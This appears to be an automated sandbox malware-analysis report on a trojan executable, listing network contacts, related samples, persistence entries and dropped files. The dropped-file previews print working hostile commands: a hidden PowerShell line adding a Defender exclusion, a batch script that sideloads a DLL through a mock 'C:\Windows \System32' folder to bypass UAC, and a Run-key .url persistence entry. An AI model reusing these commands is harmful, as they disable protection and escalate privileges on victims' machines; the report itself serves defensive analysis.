        http://crl.microsof | Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        https://go.micro | powershell.exe, 0000000D.00000003.711204031.00000172ABE21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp | false | | high
        https://contoso.com/ | powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | false | | high
        http://schemas.microsoft.coT | powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        https://contoso.com/License | powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://mscrl.micro | Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000D.00000002.735431704.00000172AA0A1000.00000004.00000001.sdmp | false | | high
        https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | false | | high

                                Contacted IPs


        Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false

        Private

        IP
        192.168.2.1

                                General Information

        Joe Sandbox Version: 32.0.0 Black Diamond
        Analysis ID: 411769
        Start date: 12.05.2021
        Start time: 06:29:05
        Joe Sandbox Product: CloudBasic
        Overall analysis duration: 0h 14m 20s
        Hypervisor based Inspection enabled: false
        Report type: light
        Sample file name: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed: 33
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 1
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Detection: MAL
        Classification: mal100.troj.evad.winEXE@29/18@9/2
        EGA Information: Failed
        HDC Information:
        • Successful, ratio: 24.1% (good quality ratio 21.7%)
        • Quality average: 66.5%
        • Quality standard deviation: 33.7%
        HCA Information:
        • Successful, ratio: 86%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 13.107.42.13, 13.107.42.12, 20.82.210.154, 92.122.213.247, 92.122.213.194, 13.107.4.50, 52.155.217.156, 20.54.26.129
                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

        Time | Type | Description
        06:29:54 | API Interceptor | 2x Sleep call for process: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe modified
        06:30:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Citvon C:\Users\Public\novtiC.url
        06:30:21 | API Interceptor | 40x Sleep call for process: powershell.exe modified
        06:30:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Citvon C:\Users\Public\novtiC.url
        06:30:28 | API Interceptor | 4x Sleep call for process: Citvon.exe modified

                                Joe Sandbox View / Context

                                IPs

        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
        198.54.117.212 | NAVTECO_R1_10_05_2021,pdf.exe | | malicious | |
                                • www.toplevelsealcoating.net/njo/?nRYxC8=mxuHlFV7ZpSkuYg6Lcwsp6DcsuxeedOYcKnp3vLhruQtfiblvIYsgHAA5WYUmu/jX1fQ&Lh38=ZTdtG87X0j
                                PO 213409701.xlsxGet hashmaliciousBrowse
                                • www.304shaughnessygreen.info/oean/?rFQt=d8/ljYFal4PMYfvauWUnApMkbVV7hvzPIdajggbW2e5rOGYmCrO1nFh35A2MgOnQN9VHwA==&rF=9rbPKz
                                SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                • www.marcellelizabeth.life/cdl/?Mfg=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uVxpj=ojO0dJYX1B
                                KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                • www.angermgmtathome.com/kio8/?9rj0DvY=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHwr7dyfFZUjr&v4=Ch6Lm
                                SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                • www.marcellelizabeth.life/cdl/?Et08qv=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uXK=hpgd6NmPQLRDNXK
                                IMG_1107.EXEGet hashmaliciousBrowse
                                • www.inifinityapps.net/bf3/?DXOX-=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2tI0Dh/A+Qh&KzuH=XPjDi0j0G
                                Bank details.exeGet hashmaliciousBrowse
                                • www.nuevasantatecla.com/ehxh/?DVBh=2SjzOZmHZnnKS6lUkurSin0GpOD0orQTIR1dgfvJrCJBvqRU2lp5oKty/puKetsuF8gN&1b0hlT=gvRpjb_Xgb6xvP
                                in.exeGet hashmaliciousBrowse
                                • www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI

                                Domains

Match | Associated Sample Name / URL | Detection | Context
parkingpage.namecheap.com | NAVTECO_R1_10_05_2021,pdf.exe | malicious
  • 198.54.117.212
parkingpage.namecheap.com | POI09876OIUY.exe | malicious
  • 198.54.117.210
parkingpage.namecheap.com | EDS03932,pdf.exe | malicious
  • 198.54.117.216
parkingpage.namecheap.com | Purchase Order.exe | malicious
  • 198.54.117.216
parkingpage.namecheap.com | slot Charges.exe | malicious
  • 198.54.117.216
parkingpage.namecheap.com | PO09641.exe | malicious
  • 198.54.117.215
parkingpage.namecheap.com | BORMAR SA_Cotizaci#U00f3n de producto doc.exe | malicious
  • 198.54.117.211
parkingpage.namecheap.com | Purchase Order-10764.exe | malicious
  • 198.54.117.212
parkingpage.namecheap.com | 4LkSpeVqKR.exe | malicious
  • 198.54.117.218
parkingpage.namecheap.com | 2B0CsHzr8o.exe | malicious
  • 198.54.117.216
parkingpage.namecheap.com | 60b88477_by_Libranalysis.exe | malicious
  • 198.54.117.215
parkingpage.namecheap.com | DHL Receipt_AWB811470484778.exe | malicious
  • 198.54.117.217
parkingpage.namecheap.com | NEW ORDER.exe | malicious
  • 198.54.117.217
parkingpage.namecheap.com | 0876543123.exe | malicious
  • 198.54.117.210
parkingpage.namecheap.com | g1EhgmCqCD.exe | malicious
  • 198.54.117.216
parkingpage.namecheap.com | Payment.xlsx | malicious
  • 198.54.117.210
parkingpage.namecheap.com | w73FtMA4ZTl9NFm.exe | malicious
  • 198.54.117.212
parkingpage.namecheap.com | Remittance Advice pdf.exe | malicious
  • 198.54.117.212
parkingpage.namecheap.com | d801e424_by_Libranalysis.docx | malicious
  • 198.54.117.218
parkingpage.namecheap.com | MRQUolkoK7.exe | malicious
  • 198.54.117.212

                                ASN

Match | Associated Sample Name / URL | Detection | Context
NAMECHEAP-NETUS | Updated Order list -804333.exe | malicious
  • 198.54.115.56
NAMECHEAP-NETUS | NAVTECO_R1_10_05_2021,pdf.exe | malicious
  • 198.54.117.212
NAMECHEAP-NETUS | BELLOW FABRICATION Dwg.exe | malicious
  • 199.188.200.15
NAMECHEAP-NETUS | file.exe | malicious
  • 198.54.115.133
NAMECHEAP-NETUS | scan of document 5336227.xlsm | malicious
  • 162.0.233.152
NAMECHEAP-NETUS | vy38Kw9qRh.exe | malicious
  • 198.54.122.60
NAMECHEAP-NETUS | copy of order 9119.xlsm | malicious
  • 162.0.233.152
NAMECHEAP-NETUS | generated payment 330070.xlsm | malicious
  • 162.0.233.152
NAMECHEAP-NETUS | scan of bill 0905.xlsm | malicious
  • 162.0.233.152
NAMECHEAP-NETUS | ProForma Invoice 20210510.exe | malicious
  • 162.0.229.247
NAMECHEAP-NETUS | ePj6KfzLBxh4vbe.exe | malicious
  • 198.54.122.60
NAMECHEAP-NETUS | zkXpISzeo3.exe | malicious
  • 198.54.122.60
NAMECHEAP-NETUS | PI-ARKEMIX HMX20210511_pdf.exe | malicious
  • 198.54.115.133
NAMECHEAP-NETUS | specifications.exe | malicious
  • 198.54.126.165
NAMECHEAP-NETUS | yl9KgwwOXDZoGMw.exe | malicious
  • 198.54.122.60
NAMECHEAP-NETUS | cargo details.exe | malicious
  • 198.54.126.165
NAMECHEAP-NETUS | Import shipment.exe | malicious
  • 198.54.126.165
NAMECHEAP-NETUS | 8DL3LHg4SB6Q7z2.exe | malicious
  • 198.54.122.60
NAMECHEAP-NETUS | Baw29sc72T.exe | malicious
  • 199.193.7.228
NAMECHEAP-NETUS | Purchase Order.exe | malicious
  • 198.54.117.216

                                JA3 Fingerprints

                                No context

                                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\Public\NETUTILS.dll | 21edfbb7_by_Libranalysis.exe | malicious
C:\Users\Public\NETUTILS.dll | Waybill Document 22700456.exe | malicious
C:\Users\Public\NETUTILS.dll | Give Offer CVE6535 _TVOP-MIO, pdf.exe | malicious
C:\Users\Public\NETUTILS.dll | aFMnf1WQEQ.exe | malicious
C:\Users\Public\NETUTILS.dll | 1RsYL7DWnf.exe | malicious
C:\Users\Public\NETUTILS.dll | 5a96079f_by_Libranalysis.exe | malicious
C:\Users\Public\NETUTILS.dll | SOA May.xlt | malicious
C:\Users\Public\NETUTILS.dll | SecuriteInfo.com.Mal.Generic-S.21221.exe | malicious
C:\Users\Public\NETUTILS.dll | RFQ-00205-0305.exe | malicious
C:\Users\Public\NETUTILS.dll | Almadeena-Bakery-005445536555665445.scr.exe | malicious
C:\Users\Public\NETUTILS.dll | Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exe | malicious
C:\Users\Public\NETUTILS.dll | To1sRo1E8P.exe | malicious
C:\Users\Public\NETUTILS.dll | wNgiGmsOwT.exe | malicious
C:\Users\Public\NETUTILS.dll | BhTxt5BUvy.exe | malicious
C:\Users\Public\NETUTILS.dll | Payment.exe | malicious
C:\Users\Public\NETUTILS.dll | Urgente RFQ_AP65425652_032421,pdf.exe | malicious
C:\Users\Public\NETUTILS.dll | Swift.exe | malicious
C:\Users\Public\NETUTILS.dll | Kemmler-New order requirement 90901U,pdf.exe | malicious
C:\Users\Public\NETUTILS.dll | __RFQAP65425652032421_pdf.exe | malicious
C:\Users\Public\NETUTILS.dll | docs-00425.exe | malicious

Created / dropped Files

C:\Users\Public\Cdex.bat
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 148
Entropy (8bit): 4.679047668453471
Encrypted: false
SSDEEP: 3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRAt:rz81R3KnMMQ75ieGgdEYlRAt
MD5: 84DE6CF0B720DB43F85D95204A2C1902
SHA1: C87C4C1F3AD9F28968C46A89C4FFF8BDB867B006
SHA-256: BC4BAAD4A7983C54C1764B0AA57F12D536CE506253C82E06DD98E17BBB5F77EE
SHA-512: 5FD018B5F72797A64934F8F35D4510EF95C235442A807D476E7FD3C14EAA854C1A3092332EDBDD1028F8954AB28ACB5AAB8720A74226CFCFAB3CB3A7772A64B7
Malicious: false
                                                                        Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Users\Public\Citvon\Citvon.exe
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 721408
Entropy (8bit): 6.799965627764192
Encrypted: false
SSDEEP: 12288:hrnWDrl98a7LUacm7sbiD97T5QM4Pr4rvU/Oy/6:hrWnZnUivR71B48rvUD/6
MD5: 4E71F90D1817F44313F4E101EF393968
SHA1: 3932F9822134761E7BF9BC1902F8CC28B6820559
SHA-256: AACE20E28E61CB328DA74FF938231B1CE9A07498D477EFE3EFC5C5D3D04B9DC1
SHA-512: A50C0E27009521B2F34358FB3BC30AFB661B75CB6BA715AC8BE15F412B50600DC3A474BD90DE74C1E1B3941F3BC0D80C7B7E16AA26969A4250EC7F4DCD234419
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 44%
• Antivirus: ReversingLabs, Detection: 66%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................P.......w...........@...........................@..<'......^G.......................l..................................................................................CODE................................ ..`DATA................................@...BSS..........0...........................idata..<'...@...(..................@....tls.........p.......F...................rdata...............F..............@..P.reloc...l.......n...H..............@..P.rsrc...^G.......H..................@..P.............p......................@..P........................................................................................................................................

C:\Users\Public\NETUTILS.dll
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 111917
Entropy (8bit): 5.03897475395042
Encrypted: false
SSDEEP: 1536:noJ4LH1bID3TdytQXt1amsk6B1w5jZcrjjAoeCl7MbiRtRDe2b:oKH1U/b1a5B1McrjjAo1RDe2b
MD5: 39507D772C63CA496A25A14A8B5D14B2
SHA1: 5B603F5C11EB9AB4313694315B4D4894FF4641D4
SHA-256: 36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
SHA-512: 0C740FD7B6D67D9938B0D8E1EA7D6C41910DD6D0B85B4EC8B6015FF8C0C73798DEE01F01DA0B5B0C07038663ACA7945FACA0E2B5AFC1CB751AABA7567D332F5F
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 5%
• Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:
• Filename: 21edfbb7_by_Libranalysis.exe, Detection: malicious
• Filename: Waybill Document 22700456.exe, Detection: malicious
• Filename: Give Offer CVE6535 _TVOP-MIO, pdf.exe, Detection: malicious
• Filename: aFMnf1WQEQ.exe, Detection: malicious
• Filename: 1RsYL7DWnf.exe, Detection: malicious
• Filename: 5a96079f_by_Libranalysis.exe, Detection: malicious
• Filename: SOA May.xlt, Detection: malicious
• Filename: SecuriteInfo.com.Mal.Generic-S.21221.exe, Detection: malicious
• Filename: RFQ-00205-0305.exe, Detection: malicious
• Filename: Almadeena-Bakery-005445536555665445.scr.exe, Detection: malicious
• Filename: Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exe, Detection: malicious
• Filename: To1sRo1E8P.exe, Detection: malicious
• Filename: wNgiGmsOwT.exe, Detection: malicious
• Filename: BhTxt5BUvy.exe, Detection: malicious
• Filename: Payment.exe, Detection: malicious
• Filename: Urgente RFQ_AP65425652_032421,pdf.exe, Detection: malicious
• Filename: Swift.exe, Detection: malicious
• Filename: Kemmler-New order requirement 90901U,pdf.exe, Detection: malicious
• Filename: __RFQAP65425652032421_pdf.exe, Detection: malicious
• Filename: docs-00425.exe, Detection: malicious
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a`.R..v.....& ..........................<a............................. ............... .................................................P............P..................\........................... ...(.......................X............................text...@........................... .P`.data...P....0......."..............@.P..rdata.......@.......$..............@.P@.pdata.......P.......*..............@.0@.xdata.......`......................@.0@.bss.........p........................p..edata...............0..............@.0@.idata..P............2..............@.0..CRT....X............:..............@.@..tls....h............<..............@.`..reloc..\............>..............@.0B/4...................@..............@.PB/19..................D..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Netplwiz.exe
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 40448
Entropy (8bit): 5.6272204024236245
Encrypted: false
SSDEEP: 768:qt4lgFHE9Lm2kEwBrIit865IKX+1XycvydfUrh6WeENiJDBPrxZt4A:SmUFBIiGYIk+1RvyweWSDBPrxZaA
MD5: F94B7FB6DAC49844D03C7087B2D8B472
SHA1: 0E84139FCED0EE8EF929D0BD5F01559A7DCF1DB0
SHA-256: 46E31F337ED0D9A6FE3F159ABC91C9B9B6A6062982BBCD84A51784D7128E7AE4
SHA-512: D63878F94F7699E4CC63C2CD885C29455E0C423D32DBA750E4FC3AA74DBACA80A1A4B176719213B9FC6584DE6A40CDDFF7864C7FB4CFBA13DFCB437A36E41B80
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................P......P......P......P..........@...P......P.|.....P......Rich............PE..d................"......2...n.......8.........@....................................G4....`.......... .......................................\...........F......................4....W..T............................P...............Q...............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......N..............@....pdata...............P..............@..@.rsrc....F.......H...T..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\Public\PXOR.bat
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 278
Entropy (8bit): 4.795821984803914
Encrypted: false
SSDEEP: 6:tPUx2cL4Vjh2cLuULT2cL9s2cL22vKZ2cLAP2cL4nTeov:tPhy6L6wXc7tOeov
MD5: 0D8AEF656413642F55E0902CC5DF5E6F
SHA1: 73EC56D08BD9B3C45D55C97BD1C1286B77C8FF49
SHA-256: 670F94B92F45BC2F3F44A80C7F3021F874AA16FDE38ED7D7F3EBED13AE09FA11
SHA-512: EFE690B1BCF06E16BE469622B45C98B5DC1F1E06410CBF7E7DCCB2975524C4D6BC7E23DE9A129D50D73CD924F02E23F925555894F2C7DA1064DCC57151F50876
Malicious: false
                                                                        Preview: mkdir "\\?\C:\Windows " ..mkdir "\\?\C:\Windows \System32"..copy "Netplwiz.exe" "C:\Windows \System32\"..copy "netutils.dll" "C:\Windows \System32\".."C:\Windows \System32\Netplwiz.exe"..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..EXIT..

C:\Users\Public\nest
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 8
Entropy (8bit): 3.0
Encrypted: false
SSDEEP: 3:5Qy:5N
MD5: 34B6D74850A2144456874BA0657E3A8E
SHA1: E55B81478C41810C4B637AA92C0BB0A2DD05246B
SHA-256: 00C3A5CC659C227722FF177F7C70110245541CD234B469D6C843994D020E9C19
SHA-512: 44C5D3FBE5F9638EA40C5D4B30FFB65AE43F11D41FC8708C686A689830F0CD9E1BF873C624E2AA275C46AFE3AC2E3FC81BD57E277A83B012A01FF17B7A6C29F0
Malicious: false
                                                                        Preview: Citvon..

C:\Users\Public\novtiC.url
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Citvon\\Citvon.exe">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 83
Entropy (8bit): 4.722023052117552
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55725VJiovsGKd6ov:HRYFVmTWDy725VJLvsbDv
MD5: 11E51DED4E25E47E7457AF16C418D16C
SHA1: 846658BFF09CC0483DB97E3E77B1CEBCAA82A98C
SHA-256: ED740E588D3E2E0EB45DE401021134A19F33FEECC5E1C51C81D56F27E5C93EDB
SHA-512: 4D7B812A8B3AC9E8FF5F31B595F881B5870082B43DFF6C05BEA319E26619B1F1755A22C349D7B69C4B94471A08A7F0247B002DC5C54F14D94CBC51FBD5322200
Malicious: false
Yara Hits:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\novtiC.url, Author: @itsreallynick (Nick Carr)
                                                                        Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Citvon\\Citvon.exe"..IconIndex=2..

C:\Users\Public\stt.bat
Process: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 35
Entropy (8bit): 4.378864088188097
Encrypted: false
SSDEEP: 3:LjTnaHF51I3LH4:rnaHpS4
MD5: 8A850253C31DF9A7E1C00C80DF2630D5
SHA1: E3DA74081B027A3B591488B28DA22742BCFE8495
SHA-256: 8FDEBA3EC903BDE700342083D16F72452366AA0B1B30D0E58DEE0AF74CEBFA35
SHA-512: 30510BDC34680A0865A0811D9BE29DEC91C74717FECCD58C9B4D88E77BE9E5D13A539806A1B2901AFF595B2FE2CC45926B69ED42E899D2DD2913C78A732E84D1
Malicious: false
                                                                        Preview: start /min C:\Users\Public\PXOR.bat
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Citvonvhciktufwvyzyhistnewdjgso[2]
                                                                        Process:C:\Users\Public\Citvon\Citvon.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4mK9mGYGZoPJZeVlBeKiTjt4bJZ5hifmcGDqMHsmjK6dGB6Axd2pMxW6R4fpxcyAAHGHgaSoYlDQUmy5BOWujymec3D31986Oj8ocC_jaF6S9Aj78jqihY2GhPmZXiRwL8ViJRhIyBPEAWhNFAwvkthj7t0_dMmim9vAeF67iBLiwNR1z4mohW-5X9Rk51AcHVI-Eto9oleZfaePBsaeaKqQ/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Citvonvhciktufwvyzyhistnewdjgso[1]
                                                                        Process:C:\Users\Public\Citvon\Citvon.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4m0u-etdTQtma9eyGnBaXZNWQMwG9GStWS6f7dfJHWJ4qZnagm6vmjluOf5etJgjGdOySymbS7QpDgnRwBlNqi-RKObO74LynjvUV4kQnKhJuuUolLlo1lGAqPKRZiq_b4FMoFDKI9xNeh_6V9nbQmE7c7zs0lauQkQ-aKJ32W5426gA2rHJPrIiFi0aWSR_g510EWbKoU1MH3cpsShYRx9w/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Citvonvhciktufwvyzyhistnewdjgso[1]
                                                                        Process:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):422400
                                                                        Entropy (8bit):7.008806645965084
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MJVJm4x18w2eTzzMH9BDO+HNGiczgPpQx5igQVmAav3v6UI5bZJjK1ya:MTJtLoR9BtGicU2+g2YvEdrK1X
                                                                        MD5:2DE8BECCA9D0F6806724B87EA5E78B3D
                                                                        SHA1:835DF69399E5D6F20C345D75C5EDFE5917FB10F0
